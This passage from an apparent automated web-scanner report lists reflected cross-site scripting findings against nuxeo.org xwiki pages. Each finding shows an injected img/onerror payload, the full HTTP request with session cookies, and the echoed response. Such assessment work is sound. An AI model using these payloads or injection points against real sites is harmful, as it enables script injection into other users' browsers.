<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf93c1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4d9be4736ed/">Mainf93c1<img src=a onerror=alert(1)>4d9be4736ed</a>
...[SNIP]...

1.73. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902 was submitted in the REST URL parameter 4. This input was echoed as 210a4"><img src=a onerror=alert(1)>0659efe6902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902/Dashboard HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:49 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main210a4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0659efe6902/Dashboard?format=xar&amp;name=Main210a4"><img src=a onerror=alert(1)>0659efe6902.Dashboard&amp;pages=Main210a4">
...[SNIP]...

1.74. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 was submitted in the REST URL parameter 5. This input was echoed as b787b"><img src=a onerror=alert(1)>f9b9ae24085 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Dashboardb787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:09 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Dashboardb787b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef9b9ae24085?format=xar&amp;name=Main.Dashboardb787b"><img src=a onerror=alert(1)>f9b9ae24085&amp;pages=Main.Dashboardb787b">
...[SNIP]...

1.75. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba was submitted in the REST URL parameter 5. This input was echoed as 97ab6<img src=a onerror=alert(1)>29fb3ec50ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Dashboard97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard97ab6%3Cimg+src%3Da+onerror%3Dalert%281%29%3E29fb3ec50ba'>Dashboard97ab6<img src=a onerror=alert(1)>29fb3ec50ba</a>
...[SNIP]...

1.76. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708 was submitted in the REST URL parameter 4. This input was echoed as b4a8a"><img src=a onerror=alert(1)>1bb236ad708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708/Downloads HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:17 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb4a8a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1bb236ad708/Downloads?format=xar&amp;name=Mainb4a8a"><img src=a onerror=alert(1)>1bb236ad708.Downloads&amp;pages=Mainb4a8a">
...[SNIP]...

1.77. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30 was submitted in the REST URL parameter 4. This input was echoed as b4709<img src=a onerror=alert(1)>207cbf0fc30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30/Downloads HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainb4709%3Cimg+src%3Da+onerror%3Dalert%281%29%3E207cbf0fc30/">Mainb4709<img src=a onerror=alert(1)>207cbf0fc30</a>
...[SNIP]...

1.78. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 was submitted in the REST URL parameter 5. This input was echoed as bfcbe"><img src=a onerror=alert(1)>9b72863cbb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Downloadsbfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Downloadsbfcbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9b72863cbb6?format=xar&amp;name=Main.Downloadsbfcbe"><img src=a onerror=alert(1)>9b72863cbb6&amp;pages=Main.Downloadsbfcbe">
...[SNIP]...

1.79. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d was submitted in the REST URL parameter 5. This input was echoed as 373b0<img src=a onerror=alert(1)>9fa509c902d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Downloads373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Downloads373b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9fa509c902d'>Downloads373b0<img src=a onerror=alert(1)>9fa509c902d</a>
...[SNIP]...

1.80. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3 was submitted in the REST URL parameter 4. This input was echoed as 34dd9<img src=a onerror=alert(1)>4dbb20e4ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3/Howto+launch+the+selenium+test+suite HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13258
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main34dd9%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dbb20e4ed3/">Main34dd9<img src=a onerror=alert(1)>4dbb20e4ed3</a>
...[SNIP]...

1.81. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6 was submitted in the REST URL parameter 4. This input was echoed as adc0c"><img src=a onerror=alert(1)>ff8c6314af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainadc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6/Howto+launch+the+selenium+test+suite HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:34 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13324
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainadc0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eff8c6314af6/Howto+launch+the+selenium+test+suite?format=xar&amp;name=Mainadc0c"><img src=a onerror=alert(1)>ff8c6314af6.Howto launch the selenium test suite&amp;pages=Mainadc0c">
...[SNIP]...

1.82. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 was submitted in the REST URL parameter 5. This input was echoed as d9017"><img src=a onerror=alert(1)>b19d426ad36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suited9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13308
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
tp://www.nuxeo.org/xwiki/bin/export/Main/Howto+launch+the+selenium+test+suited9017%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb19d426ad36?format=xar&amp;name=Main.Howto launch the selenium test suited9017"><img src=a onerror=alert(1)>b19d426ad36&amp;pages=Main.Howto launch the selenium test suited9017">
...[SNIP]...

1.83. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 was submitted in the REST URL parameter 5. This input was echoed as 2b2fb<img src=a onerror=alert(1)>5aad0972571 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13246
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5aad0972571'>Howto launch the selenium test suite2b2fb<img src=a onerror=alert(1)>5aad0972571</a>
...[SNIP]...

1.84. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7 was submitted in the REST URL parameter 4. This input was echoed as 601dd<img src=a onerror=alert(1)>5ae4cf92fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7/JCRMigration HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12936
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main601dd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5ae4cf92fe7/">Main601dd<img src=a onerror=alert(1)>5ae4cf92fe7</a>
...[SNIP]...

1.85. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b was submitted in the REST URL parameter 4. This input was echoed as 69a0c"><img src=a onerror=alert(1)>c19e02784b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b/JCRMigration HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
